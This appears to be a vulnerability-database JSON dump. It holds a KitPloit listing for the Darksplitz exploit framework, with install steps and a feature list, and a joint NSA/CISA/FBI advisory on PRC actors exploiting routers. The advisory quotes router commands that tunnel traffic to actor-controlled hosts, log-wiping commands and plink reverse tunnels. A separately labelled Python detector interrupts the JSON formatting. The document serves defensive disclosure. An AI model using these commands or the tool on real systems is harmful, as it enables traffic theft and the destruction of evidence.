"obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-14847", "CVE-2020-11261", "CVE-2021-37415", "CVE-2021-40438", "CVE-2021-44077"], "modified": "2022-01-25T00:00:00", "id": "CISA:72D01121CAFBC56638BC974ABA539CF8", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/12/01/cisa-adds-five-known-exploited-vulnerabilities-catalog", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "kitploit": [{"lastseen": "2023-07-04T12:36:55", "description": 
"[](<https://2.bp.blogspot.com/-WrSl3k8acz8/XKK-mOdvWPI/AAAAAAAAOaA/AhYa9ilCzBkxcfAhNbVH3l5YsgRSvL6tgCLcBGAs/s1600/Darksplitz.png>)\n\n \nThis tool is a continuation of the Nefix, DirsPy and Xmasspy projects. \n \n**Installation** \nIt works on [debian](<https://www.kitploit.com/search/label/Debian> \"debian\" )-based operating systems such as BackBox, Ubuntu or Kali Linux. \n\n\n 1. `$ git clone https://github.com/koboi137/darksplitz`\n 2. `$ cd darksplitz/`\n 3. `$ sudo ./install.sh`\n \n**Features** \n\n\n * Extract [mikrotik](<https://www.kitploit.com/search/label/MikroTik> \"mikrotik\" ) credentials (user.dat)\n * Password generator\n * Reverse IP lookup\n * MAC address sniffer\n * Online md5 cracker\n * MAC address lookup\n * Collect URLs from web.archive.org\n * Web [backdoor](<https://www.kitploit.com/search/label/Backdoor> \"backdoor\" ) (Dark Shell)\n * Winbox exploit (CVE-2018-14847)\n * ChimeyRed exploit for mipsbe (Mikrotik)\n * Exploit web application\n * Mass apple dos (CVE-2018-4407)\n * Libssh exploit (CVE-2018-10933)\n * Discovering Mikrotik devices\n * Directory scanner\n * Subdomain scanner\n * MAC address scanner\n * MAC address pinger\n * Vhost [scanner](<https://www.kitploit.com/search/label/Scanner> \"scanner\" ) (bypass cloudflare)\n * Mass [bruteforce](<https://www.kitploit.com/search/label/Bruteforce> \"bruteforce\" ) (wordpress)\n * Interactive msfrpc client\n \n**Exploit web application** \n\n\n * plUpload file upload\n * jQuery file upload (CVE-2018-9206)\n * Laravel (.env)\n * sftp-config.json (misc)\n * Wordpress register (enable)\n * elfinder file upload\n * Drupal 7 exploit (CVE-2018-7600)\n * Drupal 8 exploit (CVE-2018-7600)\n * com_fabrik exploit (joomla)\n * gravityform plugin file upload (wordpress)\n * geoplace3 plugin file upload (wordpress)\n * peugeot-music plugin file upload (wordpress)\n \n**Notes** \nThis tool works best as root, because the scapy module and other components need root to access some features. 
But you can run as user too in some features. ;) \n \n \n\n\n**[Download Darksplitz](<https://github.com/koboi137/darksplitz> \"Download Darksplitz\" )**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-04-04T21:12:00", "type": "kitploit", "title": "Darksplitz - Exploit Framework", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-10933", "CVE-2018-14847", "CVE-2018-4407", "CVE-2018-7600", "CVE-2018-9206"], "modified": "2019-04-04T21:12:09", "id": "KITPLOIT:5494076556436489947", "href": "http://www.kitploit.com/2019/04/darksplitz-exploit-framework.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "ics": [{"lastseen": "2023-09-23T06:41:43", "description": "### Summary\n\nBest Practices \n\u2022 Apply patches as soon as possible \n\u2022 Disable unnecessary ports and protocols \n\u2022 Replace end-of-life infrastructure \n\u2022 Implement a centralized patch management system\n\nThis joint Cybersecurity Advisory describes the ways in which People\u2019s Republic of China (PRC) state-sponsored cyber actors continue to exploit publicly known vulnerabilities in order to 
establish a broad network of compromised infrastructure. These actors use the network to exploit a wide variety of targets worldwide, including public and private sector organizations. The advisory details the targeting and compromise of major telecommunications companies and network service providers and the top vulnerabilities\u2014primarily Common Vulnerabilities and Exposures (CVEs)\u2014associated with network devices routinely exploited by the cyber actors since 2020.\n\nThis joint Cybersecurity Advisory was coauthored by the National Security Agency (NSA), the Cybersecurity and Infrastructure Security Agency (CISA), and the Federal Bureau of Investigation (FBI). It builds on previous NSA, CISA, and FBI reporting to inform federal and state, local, tribal, and territorial (SLTT) government; critical infrastructure (CI), including the Defense Industrial Base (DIB); and private sector organizations about notable trends and persistent tactics, techniques, and procedures (TTPs).\n\nEntities can mitigate the vulnerabilities listed in this advisory by applying the available patches to their systems, replacing end-of-life infrastructure, and implementing a centralized patch management program.\n\nNSA, CISA, and the FBI urge U.S. 
and allied governments, CI, and private industry organizations to apply the recommendations listed in the Mitigations section and Appendix A: Vulnerabilities to increase their defensive posture and reduce the risk of PRC state-sponsored malicious cyber actors affecting their critical networks.\n\nFor more information on PRC state-sponsored malicious cyber activity, see CISA\u2019s [China Cyber Threat Overview and Advisories](<https://www.cisa.gov/uscert/china>) webpage.\n\n[Click here](<https://media.defense.gov/2022/Jun/07/2003013376/-1/-1/0/CSA_PRC_SPONSORED_CYBER_ACTORS_EXPLOIT_NETWORK_PROVIDERS_DEVICES_TLPWHITE.PDF>) for PDF.\n\n### Common vulnerabilities exploited by People\u2019s Republic of China state-sponsored cyber actors\n\nPRC state-sponsored cyber actors readily exploit vulnerabilities to compromise unpatched network devices. Network devices, such as Small Office/Home Office (SOHO) routers and Network Attached Storage (NAS) devices, serve as additional access points to route command and control (C2) traffic and act as midpoints to conduct network intrusions on other entities. Over the last few years, a series of high-severity vulnerabilities for network devices provided cyber actors with the ability to regularly exploit and gain access to vulnerable infrastructure devices. In addition, these devices are often overlooked by cyber defenders, who struggle to maintain and keep pace with routine software patching of Internet-facing services and endpoint devices.\n\nSince 2020, PRC state-sponsored cyber actors have conducted widespread campaigns to rapidly exploit publicly identified security vulnerabilities, also known as common vulnerabilities and exposures (CVEs). 
This technique has allowed the actors to gain access into victim accounts using publicly available exploit code against virtual private network (VPN) services [[T1133](<https://attack.mitre.org/techniques/T1133/>)] or public facing applications [[T1190](<https://attack.mitre.org/techniques/T1190/>)]\u2014without using their own distinctive or identifying malware\u2014so long as the actors acted before victim organizations updated their systems. \n\nPRC state-sponsored cyber actors typically conduct their intrusions by accessing compromised servers called hop points from numerous China-based Internet Protocol (IP) addresses resolving to different Chinese Internet service providers (ISPs). The cyber actors typically obtain the use of servers by leasing remote access directly or indirectly from hosting providers. They use these servers to register and access operational email accounts, host C2 domains, and interact with victim networks. Cyber actors use these hop points as an obfuscation technique when interacting with victim networks.\n\nThese cyber actors are also consistently evolving and adapting tactics to bypass defenses. NSA, CISA, and the FBI have observed state-sponsored cyber actors monitoring network defenders\u2019 accounts and actions, and then modifying their ongoing campaign as needed to remain undetected. Cyber actors have modified their infrastructure and toolsets immediately following the release of information related to their ongoing campaigns. 
PRC state-sponsored cyber actors often mix their customized toolset with publicly available tools, especially by leveraging tools that are native to the network environment, to obscure their activity by blending into the noise or normal activity of a network.\n\nNSA, CISA, and the FBI consider the common vulnerabilities and exposures (CVEs) listed in Table 1 to be the network device CVEs most frequently exploited by PRC state-sponsored cyber actors since 2020.\n\n_**Table 1: Top network device CVEs exploited by PRC state-sponsored cyber actors**_\n\nVendor | CVE | Vulnerability Type \n---|---|--- \nCisco | CVE-2018-0171 | Remote Code Execution \nCisco | CVE-2019-15271 | RCE \nCisco | CVE-2019-1652 | RCE \nCitrix | CVE-2019-19781 | RCE \nDrayTek | CVE-2020-8515 | RCE \nD-Link | CVE-2019-16920 | RCE \nFortinet | CVE-2018-13382 | Authentication Bypass \nMikroTik | CVE-2018-14847 | Authentication Bypass \nNetgear | CVE-2017-6862 | RCE \nPulse | CVE-2019-11510 | Authentication Bypass \nPulse | CVE-2021-22893 | RCE \nQNAP | CVE-2019-7192 | Privilege Elevation \nQNAP | CVE-2019-7193 | Remote Inject \nQNAP | CVE-2019-7194 | XML Routing Detour Attack \nQNAP | CVE-2019-7195 | XML Routing Detour Attack \nZyxel | CVE-2020-29583 | Authentication Bypass \n \n### Telecommunications and network service provider targeting\n\nPRC state-sponsored cyber actors frequently utilize open-source tools for reconnaissance and vulnerability scanning. The actors have utilized open-source router specific software frameworks, RouterSploit and RouterScan [[T1595.002](<https://attack.mitre.org/techniques/T1595/002/>)], to identify makes, models, and known vulnerabilities for further investigation and exploitation. The RouterSploit Framework is an open-source exploitation framework dedicated to embedded devices. RouterScan is an open-source tool that easily allows for the scanning of IP addresses for vulnerabilities. 
These tools enable exploitation of SOHO and other routers manufactured by major industry providers, including Cisco, Fortinet, and MikroTik.\n\nUpon gaining an initial foothold into a telecommunications organization or network service provider, PRC state-sponsored cyber actors have identified critical users and infrastructure including systems critical to maintaining the security of authentication, authorization, and accounting. After identifying a critical Remote Authentication Dial-In User Service (RADIUS) server, the cyber actors gained credentials to access the underlying Structured Query Language (SQL) database [[T1078](<https://attack.mitre.org/techniques/T1078/>)] and utilized SQL commands to dump the credentials [[T1555](<https://attack.mitre.org/techniques/T1555/>)], which contained both cleartext and hashed passwords for user and administrative accounts. \n\nHaving gained credentials from the RADIUS server, PRC state-sponsored cyber actors used those credentials with custom automated scripts to authenticate to a router via Secure Shell (SSH), execute router commands, and save the output [[T1119](<https://attack.mitre.org/techniques/T1119/>)]. These scripts targeted Cisco and Juniper routers and saved the output of the executed commands, including the current configuration of each router. After successfully capturing the command output, these configurations were exfiltrated off network to the actor\u2019s infrastructure [[TA0010](<https://attack.mitre.org/tactics/TA0010/>)]. 
The cyber actors likely used additional scripting to further automate the exploitation of medium to large victim networks, where routers and switches are numerous, to gather massive numbers of router configurations that would be necessary to successfully manipulate traffic within the network.\n\nArmed with valid accounts and credentials from the compromised RADIUS server and the router configurations, the cyber actors returned to the network and used their access and knowledge to successfully authenticate and execute router commands to surreptitiously route [[T1599](<https://attack.mitre.org/techniques/T1599/>)], capture [[T1020.001](<https://attack.mitre.org/techniques/T1020/001/>)], and exfiltrate traffic out of the network to actor-controlled infrastructure. \n\nWhile other manufacturers likely have similar commands, the cyber actors executed the following commands on a Juniper router to perform initial tunnel configuration for eventual exfiltration out of the network:\n\nset chassis fpc <slot number> pic <user defined value> tunnel-services bandwidth <user defined value> \nset chassis network-services all-ethernet \nset interfaces <interface-id> unit <unit number> tunnel source <local network IP address> \nset interfaces <interface-id> unit <unit number> tunnel destination <actor controlled IP address> \n\n\nAfter establishing the tunnel, the cyber actors configured the local interface on the device and updated the routing table to route traffic to actor-controlled infrastructure.\n\nset interfaces <interface-id> unit <unit number> family inet address <local network IP address subnet> \nset routing-options static route <local network IP address> next-hop <actor controlled IP address> \n\n\nPRC state-sponsored cyber actors then configured port mirroring to copy all traffic to the local interface, which was subsequently forwarded through the tunnel out of the network to actor-controlled infrastructure. 
\n\nset firewall family inet filter <filter name> term <filter variable> then port-mirror \nset forwarding-options port-mirroring input rate 1 \nset forwarding-options port-mirroring family inet output interface <interface-id> next-hop <local network IP address> \nset forwarding-options port-mirroring family inet output no-filter-check \nset interfaces <interface-id> unit <unit number> family inet filter input <filter name> \nset interfaces <interface-id> unit <unit number> family inet filter output <filter name> \n\n\nHaving completed their configuration changes, the cyber actors often modified and/or removed local log files to destroy evidence of their activity to further obfuscate their presence and evade detection.\n\nsed -i -e '/<REGEX>/d' <log filepath 1> \nsed -i -e '/<REGEX>/d' <log filepath 2> \nsed -i -e '/<REGEX>/d' <log filepath 3> \nrm -f <log filepath 4> \nrm -f <log filepath 5> \nrm -f <log filepath 6> \n\n\nPRC state-sponsored cyber actors also utilized command line utility programs like PuTTY Link (Plink) to establish SSH tunnels [[T1572](<https://attack.mitre.org/techniques/T1572/>)] between internal hosts and leased virtual private server (VPS) infrastructure. These actors often conducted system network configuration discovery [[T1016.001](<https://attack.mitre.org/techniques/T1016/001/>)] on these host networks by sending hypertext transfer protocol (HTTP) requests to C2 infrastructure in order to illuminate the external public IP address.\n\nplink.exe -N -R <local port>:<host 1>:<remote port> -pw <user defined password> -batch root@<VPS1> -P <remote SSH port> \nplink.exe -N -R <local port>:<host 2>:<remote port> -pw <user defined password> -batch root@<VPS2> -P <remote SSH port> \n\n\n### Mitigations\n\nNSA, CISA, and the FBI urge organizations to apply the following recommendations as well as the mitigation and detection recommendations in Appendix A, which are tailored to observed tactics and techniques. 
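The Junos tunnel, static-route and port-mirroring commands and the plink reverse tunnels above are easier to hunt for as a chain than as isolated commands. The following Python is an added example, not part of the advisory or any agency tool: it audits Junos `set` lines (as produced by `show configuration | display set`) for the full exfiltration pattern (tunnel to an external destination, static route toward it, port mirroring into it) and parses a Windows process command line for a plink `-R` reverse tunnel, tolerating the en-dash that often replaces `-` when commands are copied from documents. The internal address ranges, the sample configuration and the sample command line are constructed assumptions, not data from the advisory.

```python
import ipaddress
import re

# Assumption: the defender's own address space. Anything outside it is treated
# as "external" (actor-controlled or unknown). Adjust to the real environment.
INTERNAL_NETS = [ipaddress.ip_network(n)
                 for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def is_external(text):
    """True for an IP literal outside INTERNAL_NETS; False for internal or non-IP text."""
    try:
        ip = ipaddress.ip_address(text)
    except ValueError:
        return False
    return not any(ip in net for net in INTERNAL_NETS)


# One rule per stage of the tradecraft: (name, regex over one 'set' line,
# optional check applied to the regex's first capture group).
JUNOS_RULES = [
    ("tunnel-services enabled", re.compile(r"^set chassis fpc \S+ pic \S+ tunnel-services"), None),
    ("tunnel to external destination", re.compile(r"^set interfaces \S+ unit \S+ tunnel destination (\S+)"), is_external),
    ("static route to external next-hop", re.compile(r"^set routing-options static route \S+ next-hop (\S+)"), is_external),
    ("port-mirror firewall term", re.compile(r"^set firewall family inet filter \S+ term \S+ then port-mirror"), None),
    ("port-mirroring output interface", re.compile(r"^set forwarding-options port-mirroring family inet output interface"), None),
    ("port-mirroring filter check disabled", re.compile(r"^set forwarding-options port-mirroring .* no-filter-check$"), None),
]


def audit_junos(lines):
    """Return (line_no, rule_name, line) for every 'set' statement matching a rule."""
    hits = []
    for n, raw in enumerate(lines, 1):
        line = raw.strip()
        for name, rx, check in JUNOS_RULES:
            m = rx.search(line)
            if m and (check is None or check(m.group(1))):
                hits.append((n, name, line))
    return hits


def junos_exfil_chain(lines):
    """True when tunnel-out, route-to-tunnel and port-mirroring are all present:
    the combination, not any single line, is the advisory's exfiltration pattern."""
    names = {name for _, name, _ in audit_junos(lines)}
    return ("tunnel to external destination" in names
            and "static route to external next-hop" in names
            and any(name.startswith("port-mirror") for name in names))


def plink_reverse_tunnel(cmdline):
    """Parse a process command line (e.g. Sysmon event 1 or Security 4688).
    Return a dict describing a plink '-R' reverse tunnel, or None otherwise."""
    argv = cmdline.replace("\u2013", "-").split()   # en-dash from copy/paste -> '-'
    if not argv:
        return None
    exe = argv[0].replace("\\", "/").rsplit("/", 1)[-1].lower()
    if exe not in ("plink", "plink.exe"):
        return None
    info = {"remote_forwards": [], "password_on_cli": False, "target": None,
            "port": 22, "external_target": False}
    i = 1
    while i < len(argv):
        arg = argv[i]
        if arg == "-R" and i + 1 < len(argv):
            info["remote_forwards"].append(argv[i + 1])   # <local>:<host>:<port>
            i += 2
        elif arg == "-pw":
            info["password_on_cli"] = True   # credential exposed in process logs
            i += 2
        elif arg == "-P" and i + 1 < len(argv):
            info["port"] = int(argv[i + 1])
            i += 2
        else:
            if "@" in arg and info["target"] is None:
                info["target"] = arg.split("@", 1)[1]   # user@<VPS>
            i += 1
    if not info["remote_forwards"]:
        return None
    info["external_target"] = is_external(info["target"] or "")
    return info


# Constructed samples (not from the advisory) following the command templates above.
SAMPLE_JUNOS = """\
set chassis fpc 0 pic 0 tunnel-services bandwidth 1g
set interfaces gr-0/0/0 unit 0 tunnel source 10.1.1.5
set interfaces gr-0/0/0 unit 0 tunnel destination 203.0.113.10
set interfaces gr-0/0/0 unit 0 family inet address 10.99.0.1/30
set routing-options static route 10.99.0.0/30 next-hop 203.0.113.10
set firewall family inet filter MIRROR term all then port-mirror
set forwarding-options port-mirroring input rate 1
set forwarding-options port-mirroring family inet output interface gr-0/0/0.0 next-hop 10.99.0.2
set forwarding-options port-mirroring family inet output no-filter-check
set interfaces ge-0/0/1 unit 0 family inet filter input MIRROR
set system services ssh""".splitlines()

SAMPLE_PLINK = ("C:\\Users\\Public\\plink.exe -N -R 8443:10.20.30.40:443 "
                "-pw Passw0rd -batch root@198.51.100.7 -P 2222")
```

Run `audit_junos` over a configuration diff or a periodic `display set` export rather than a single snapshot: the tunnel and route lines are the stable indicators, while the mirror filter may be removed after a collection window. For plink, alert on `-R` regardless of target reachability; the `external_target` flag only helps prioritise.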
While some vulnerabilities have specific additional mitigations below, the following mitigations generally apply:\n\n * Keep systems and products updated and patched as soon as possible after patches are released [[D3-SU](<https://d3fend.mitre.org/technique/d3f:SoftwareUpdate/>)]. Consider leveraging a centralized patch management system to automate and expedite the process.\n * Immediately remove or isolate suspected compromised devices from the network [[D3-ITF](<https://d3fend.mitre.org/technique/d3f:InboundTrafficFiltering/>)] [[D3-OTF](<https://d3fend.mitre.org/technique/d3f:OutboundTrafficFiltering/>)].\n * Segment networks to limit or block lateral movement [[D3-NI](<https://d3fend.mitre.org/technique/d3f:NetworkIsolation>)]. \n * Disable unused or unnecessary network services, ports, protocols, and devices [[D3-ACH](<https://d3fend.mitre.org/technique/d3f:ApplicationConfigurationHardening/>)] [[D3-ITF](<https://d3fend.mitre.org/technique/d3f:InboundTrafficFiltering/>)] [[D3-OTF](<https://d3fend.mitre.org/technique/d3f:OutboundTrafficFiltering/>)]. \n * Enforce multifactor authentication (MFA) for all users, without exception [[D3-MFA](<https://d3fend.mitre.org/technique/d3f:Multi-factorAuthentication/>)]. \n * Enforce MFA on all VPN connections [[D3-MFA](<https://d3fend.mitre.org/technique/d3f:Multi-factorAuthentication/>)]. If MFA is unavailable, enforce password complexity requirements [[D3-SPP](<https://d3fend.mitre.org/technique/d3f:StrongPasswordPolicy/>)]. \n * Implement strict password requirements, enforcing password complexity, changing passwords at a defined frequency, and performing regular account reviews to ensure compliance [[D3-SPP](<https://d3fend.mitre.org/technique/d3f:StrongPasswordPolicy/>)].\n * Perform regular data backup procedures and maintain up-to-date incident response and recovery procedures. 
\n * Disable external management capabilities and set up an out-of-band management network [[D3-NI](<https://d3fend.mitre.org/technique/d3f:NetworkIsolation/>)].\n * Isolate Internet-facing services in a network Demilitarized Zone (DMZ) to reduce the exposure of the internal network [[D3-NI](<https://d3fend.mitre.org/technique/d3f:NetworkIsolation/>)].\n * Enable robust logging of Internet-facing services and monitor the logs for signs of compromise [[D3-NTA](<https://d3fend.mitre.org/technique/d3f:NetworkTrafficAnalysis/>)] [[D3-PM](<https://d3fend.mitre.org/technique/d3f:PlatformMonitoring/>)].\n * Ensure that you have dedicated management systems [[D3-PH](<https://d3fend.mitre.org/technique/d3f:PlatformHardening/>)] and accounts for system administrators. Protect these accounts with strict network policies [[D3-UAP](<https://d3fend.mitre.org/technique/d3f:UserAccountPermissions/>)].\n * Enable robust logging and review of network infrastructure accesses, configuration changes, and critical infrastructure services performing authentication, authorization, and accounting functions [[D3-PM](<https://d3fend.mitre.org/technique/d3f:PlatformMonitoring/>)]. \n * Upon responding to a confirmed incident within any portion of a network, response teams should scrutinize network infrastructure accesses, evaluate potential lateral movement to network infrastructure and implement corrective actions commensurate with their findings.\n\n### Resources\n\nRefer to [us-cert.cisa.gov/china](<https://us-cert.cisa.gov/china>), <https://www.ic3.gov/Home/IndustryAlerts>, and <https://www.nsa.gov/cybersecurity-guidance> for previous reporting on People\u2019s Republic of China state-sponsored malicious cyber activity.\n\nU.S. government and critical infrastructure organizations should consider signing up for CISA\u2019s [cyber hygiene services](<https://www.cisa.gov/cyber-hygiene-services>), including vulnerability scanning, to help reduce exposure to threats.\n\nU.S. 
Defense Industrial Base (DIB) organizations should consider signing up for the NSA Cybersecurity Collaboration Center\u2019s DIB Cybersecurity Service Offerings, including [Protective Domain Name System](<https://www.nsa.gov/About/Cybersecurity-Collaboration-Center/PDNS/>) (PDNS) services, vulnerability scanning, and threat intelligence collaboration. For more information on eligibility criteria and how to enroll in these services, email [dib_defense@cyber.nsa.gov](<mailto:dib_defense@cyber.nsa.gov>).\n\n### Additional References\n\n * CISA (2022), Weak Security Controls and Practices Routinely Exploited for Initial Access. <https://www.cisa.gov/uscert/ncas/alerts/aa22-137a>\n * CISA (2022), 2021 Top Routinely Exploited Vulnerabilities. <https://www.cisa.gov/uscert/ncas/alerts/aa22-117a>\n * NSA (2021), Selecting and Hardening Remote Access VPN Solutions. <https://media.defense.gov/2021/Sep/28/2002863184/-1/-1/0/CSI_SELECTING-HARDENING-REMOTE-ACCESS-VPNS-20210928.PDF>\n * NSA (2021), Chinese State-Sponsored Cyber Operations: Observed TTPs. <https://media.defense.gov/2021/Jul/19/2002805003/-1/-1/0/CSA_CHINESE_STATE-SPONSORED_CYBER_TTPS.PDF>\n * CISA (2021), Exploitation of Pulse Connect Secure Vulnerabilities. <https://www.cisa.gov/uscert/ncas/alerts/aa21-110a>\n * NSA (2020), Chinese State-Sponsored Actors Exploit Publicly Known Vulnerabilities. <https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>\n * CISA (2020), Chinese Ministry of State Security-Affiliated Cyber Threat Actor Activity. <https://www.cisa.gov/uscert/ncas/alerts/aa20-258a>\n * NSA (2020), Performing Out-of-Band Network Management. 
<https://media.defense.gov/2020/Sep/17/2002499616/-1/-1/0/PERFORMING_OUT_OF_BAND_NETWORK_MANAGEMENT20200911.PDF>\n * CISA (2020), Critical Vulnerability in Citrix Application Delivery Controller, Gateway, and SD-WAN WANOP. <https://www.cisa.gov/uscert/ncas/alerts/aa20-020a>\n * NSA (2019), Mitigating Recent VPN Vulnerabilities. <https://media.defense.gov/2019/Oct/07/2002191601/-1/-1/0/Mitigating%20Recent%20VPN%20Vulnerabilities%20-%20Copy.pdf>\n * NSA (2019), Update and Upgrade Software Immediately. <https://media.defense.gov/2019/Sep/09/2002180319/-1/-1/0/Update%20and%20Upgrade%20Software%20Immediately.docx%20-%20Copy.pdf>\n\n### Contact Information \n\nTo report incidents and anomalous activity or to request incident response resources or technical assistance related to these threats, contact CISA at [report@cisa.gov](<mailto:report@cisa.gov>). To report computer intrusion or cybercrime activity related to information found in this advisory, contact your local FBI field office at [www.fbi.gov/contact-us/field](<http://www.fbi.gov/contact-us/field>), or the FBI\u2019s 24/7 Cyber Watch at 855-292-3937 or by email at [CyWatch@fbi.gov](<mailto:CyWatch@fbi.gov>). For NSA client requirements or general cybersecurity inquiries, contact [Cybersecurity_Requests@nsa.gov](<mailto:Cybersecurity_Requests@nsa.gov>). \n\nMedia Inquiries / Press Desk: \n\n * NSA Media Relations, 443-634-0721, [MediaRelations@nsa.gov](<mailto:MediaRelations@nsa.gov>)\n * CISA Media Relations, 703-235-2010, [CISAMedia@cisa.dhs.gov](<mailto:CISAMedia@cisa.dhs.gov>)\n * FBI National Press Office, 202-324-3691, [npo@fbi.gov](<mailto:npo@fbi.gov>)\n\n### _Disclaimer of endorsement_\n\nThe information and opinions contained in this document are provided \"as is\" and without any warranties or guarantees. 
Reference herein to any specific commercial products, process, or service by trade name, trademark, manufacturer, or otherwise, does not constitute or imply its endorsement, recommendation, or favoring by the United States Government, and this guidance shall not be used for advertising or product endorsement purposes.\n\n### _Purpose_\n\nThis advisory was developed by NSA, CISA, and the FBI in furtherance of their respective cybersecurity missions, including their responsibilities to develop and issue cybersecurity specifications and mitigations. This information may be shared broadly to reach all appropriate stakeholders. \n\n### Appendix A: Vulnerabilities\n\n**_Table 2: Information on Cisco CVE-2018-0171_**\n\nCisco CVE-2018-0171 CVSS 3.0: 9.8 (Critical) \n--- \n \n**_Vulnerability Description _**\n\nA vulnerability in the Smart Install feature of Cisco IOS Software and Cisco IOS XE Software could allow an unauthenticated, remote attacker to trigger a reload of an affected device, resulting in a denial of service (DoS) condition, or to execute arbitrary code on an affected device. The vulnerability is due to improper validation of packet data. An attacker could exploit this vulnerability by sending a crafted Smart Install message to an affected device on TCP port 4786. A successful exploit could allow the attacker to cause a buffer overflow on the affected device, which could have the following impacts: Triggering a reload of the device, Allowing the attacker to execute arbitrary code on the device, causing an indefinite loop on the affected device that triggers a watchdog crash. \n \n_**Recommended Mitigations **_\n\n * Cisco has released software updates that address this vulnerability.\n * In addition, the Cisco Smart Install feature is highly recommended to be disabled to reduce exposure. 
\n_**Detection Methods**_\n\n * Cisco IOS Software Checker \n \n_**Vulnerable Technologies and Versions**_\n\nThe vulnerability affects Cisco devices that are running a vulnerable release of Cisco IOS or IOS XE software and have the Smart Install client feature enabled. Only Smart Install client switches are affected by the vulnerability described in this advisory. \n \n_**References**_\n\n<http://www.securityfocus.com/bid/103538> \n<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-smi2> \n<https://ics-cert.us-cert.gov/advisories/ICSA-18-107-04> \n<https://ics-cert.us-cert.gov/advisories/ICSA-18-107-05> \n<https://www.darkreading.com/perimeter/attackers-exploit-cisco-switch-issue-as-vendor-warns-of-yet-another-critical-flaw/d/d-id/1331490> \n<http://www.securitytracker.com/id/1040580> \n \n**_Table 3: Information on Cisco CVE-2019-15271_**\n\nCisco CVE-2019-15271 CVSS 3.0: 8.8 (High) \n--- \n \n**_Vulnerability Description _**\n\nA vulnerability in the web-based management interface of certain Cisco Small Business RV Series Routers could allow an authenticated, remote attacker to execute arbitrary commands with root privileges. The attacker must have either a valid credential or an active session token. The vulnerability is due to lack of input validation of the HTTP payload. An attacker could exploit this vulnerability by sending a malicious HTTP request to the web-based management interface of the targeted device. A successful exploit could allow the attacker to execute commands with root privileges. 
\n \n**_Recommended Mitigations _**\n\n * Cisco has released free software updates that address the vulnerability described in this advisory.\n * Cisco fixed this vulnerability in firmware releases 4.2.3.10 and later for the Cisco RV042 Dual WAN VPN Router and RV042G Dual Gigabit WAN VPN Router.\n * Administrators can reduce the attack surface by disabling the Remote Management feature if there is no operational requirement to use it. Note that the feature is disabled by default. \n_**Detection Methods **_\n\n * N/A \n \n_**Vulnerable Technologies and Versions **_\n\nThis vulnerability affects the following Cisco Small Business RV Series Routers if they are running a firmware release earlier than 4.2.3.10:\n\n * RV016 Multi-WAN VPN Router\n * RV042 Dual WAN VPN Router\n * RV042G Dual Gigabit WAN VPN Router\n * RV082 Dual WAN VPN Router \n \n_**References **_\n\n<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20191106-sbrv-cmd-x> \n \n**_Table 4: Information on Cisco CVE-2019-1652_**\n\nCisco CVE-2019-1652 CVSS 3.0: 7.2 (High) \n--- \n \n_**Vulnerability Description **_\n\nA vulnerability in the web-based management interface of Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN Routers could allow an authenticated, remote attacker with administrative privileges on an affected device to execute arbitrary commands. The vulnerability is due to improper validation of user-supplied input. An attacker could exploit this vulnerability by sending malicious HTTP POST requests to the web-based management interface of an affected device. A successful exploit could allow the attacker to execute arbitrary commands on the underlying Linux shell as root. Cisco has released firmware updates that address this vulnerability. 
\n \n_**Recommended Mitigations **_\n\n * Cisco has released free software updates that address the vulnerability described in this advisory.\n * This vulnerability is fixed in RV320 and RV325 Dual Gigabit WAN VPN Routers Firmware Release 1.4.2.22 and later.\n * If the Remote Management feature is enabled, Cisco recommends disabling it to reduce exposure. \n**_Detection Methods _**\n\n * N/A \n \n_**Vulnerable Technologies and Versions **_\n\nThis vulnerability affects Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN Routers running firmware releases 1.4.2.15 through 1.4.2.20. \n \n_**References**_\n\n<http://www.securityfocus.com/bid/106728> \n<https://seclists.org/bugtraq/2019/Mar/55> \n<https://www.exploit-db.com/exploits/46243/> \n<https://www.exploit-db.com/exploits/46655/> \n<http://seclists.org/fulldisclosure/2019/Mar/61> \n<http://packetstormsecurity.com/files/152262/Cisco-RV320-Command-Injection.html> \n<http://packetstormsecurity.com/files/152305/Cisco-RV320-RV325-Unauthenticated-Remote-Code-Execution.html> \n<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-inject> \n \n**_Table 5: Information on Citrix CVE-2019-19781_**\n\nCitrix CVE-2019-19781 CVSS 3.0: 9.8 (Critical) \n--- \n \n_**Vulnerability Description **_\n\nAn issue was discovered in Citrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0. They allow Directory Traversal. \n \n_**Recommended Mitigations**_\n\n * Implement the appropriate refresh according to the 